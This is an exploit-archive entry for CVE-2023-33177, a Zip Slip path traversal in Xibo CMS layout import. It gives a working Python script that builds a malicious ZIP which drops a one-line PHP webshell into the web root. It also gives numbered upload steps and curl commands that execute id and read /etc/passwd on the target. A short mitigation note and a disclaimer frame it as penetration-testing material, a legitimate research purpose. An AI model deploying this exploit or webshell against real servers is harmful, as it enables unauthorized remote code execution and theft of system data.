xibocms 3.3.4 - RCE

# Exploit Title: XiboCMS 3.3.4-  Remote Code Execution
# Google Dork: N/A
# Date: 2025-11-18
# Exploit Author: complexusprada
# Vendor Homepage: https://xibo.org.uk/
# Software Link: https://github.com/xibosignage/xibo-cms
# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
# CVE: CVE-2023-33177
# GHSA: GHSA-jj27-x85q-crqv
# Category: webapps

"""
# Vulnerability Description:
# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
# functionality. The application fails to properly validate file paths in the mapping.json
# file within uploaded ZIP archives, allowing authenticated attackers to write files
# outside the intended library directory using path traversal sequences (../../).
# This results in arbitrary file upload and remote code execution.

# Exploitation Details:
# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
# 4. When the layout is imported, Xibo extracts files without proper path validation
# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
# 6. Attacker gains remote code execution via the webshell

# Vulnerability Chain:
# ZIP contains:  library/../../web/shell.php
# Mapping.json:  {"file": "../../web/shell.php", ...}
# Xibo reads:    library/ + ../../web/shell.php
# Xibo writes:   /var/www/cms/library/temp/ + ../../web/shell.php
# Result:        /var/www/cms/web/shell.php (webshell in web root!)

# Prerequisites:
# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4

# Exploitation Steps:
# 1. Run this script to generate exploit.zip
# 2. Log in to Xibo CMS
# 3. Navigate to: Design → Layouts → Import
# 4. Upload the generated exploit.zip file
# 5. Even if JSON errors occur, the webshell has been written to disk
# 6. Access webshell at: http://<target>/shell.php?cmd=<command>
# Example: curl 'http://target/shell.php?cmd=id'

# Mitigation:
# Upgrade to patched versions:
# - Xibo CMS 2.3.17+ (for 2.x branch)
# - Xibo CMS 3.3.5+ (for 3.x branch)

# Disclaimer:
# This exploit is provided for educational purposes, authorized penetration testing,
# and vulnerability research only. Only use against systems you own or have explicit
# written permission to test.
"""

import zipfile
import json
import sys

def create_exploit():
    """Generate the malicious ZIP file for Xibo CMS RCE exploit"""

    print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
    print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
    print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")

    # Valid Xibo 3.0 layout structure
    # This ensures the ZIP passes initial validation checks
    layout_json = {
        "layout": "Exploit Layout",
        "description": "Path Traversal Test",
        "layoutDefinitions": {
            "schemaVersion": 3,
            "width": 1920,
            "height": 1080,
            "backgroundColor": "#000000",
            "backgroundzIndex": 0,
            "code": "CVE-2023-33177",
            "actions": [],
            "regions": [],
            "drawers": []
        }
    }

    # Empty playlist - triggers JSON import code path
    playlist_json = {}

    # VULNERABILITY: Path traversal in mapping.json
    # The 'file' field is not properly sanitized before file extraction
    # Xibo constructs the extraction path as: library/temp/ + file['file']
    # Using ../../ allows escaping the library directory
    mapping_json = [{
        "file": "../../web/shell.php",  # Path traversal payload
        "name": "shell.php",
        "type": "module"
    }]

    # Simple PHP webshell for command execution
    # Accepts commands via GET parameter: ?cmd=<command>
    webshell = b'<?php system($_GET["cmd"]); ?>'

    # Create the malicious ZIP file
    try:
        with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
            # Add required Xibo layout files
            zf.writestr('layout.json', json.dumps(layout_json, indent=2))
            zf.writestr('playlist.json', json.dumps(playlist_json))
            zf.writestr('mapping.json', json.dumps(mapping_json))

            # CRITICAL: The file path in the ZIP must match what Xibo expects
            # Xibo calls: $zip->getStream('library/' . $file['file'])
            # Therefore we place the file at: library/../../web/shell.php
            zf.writestr('library/../../web/shell.php', webshell)

        print("[+] Exploit ZIP created successfully: exploit.zip")
        print("\n[*] Exploitation Steps:")
        print("    1. Log in to Xibo CMS with valid credentials")
        print("    2. Navigate to: Design → Layouts → Import")
        print("    3. Upload exploit.zip")
        print("    4. Ignore any JSON errors (file is already written)")
        print("    5. Access webshell: http://<target>/shell.php?cmd=<command>")
        print("\n[*] Example:")
        print("    curl 'http://target/shell.php?cmd=id'")
        print("    curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
        print()

    except Exception as e:
        print(f"[-] Error creating exploit: {e}", file=sys.stderr)
        sys.exit(1)

if __name__ == "__main__":
    create_exploit()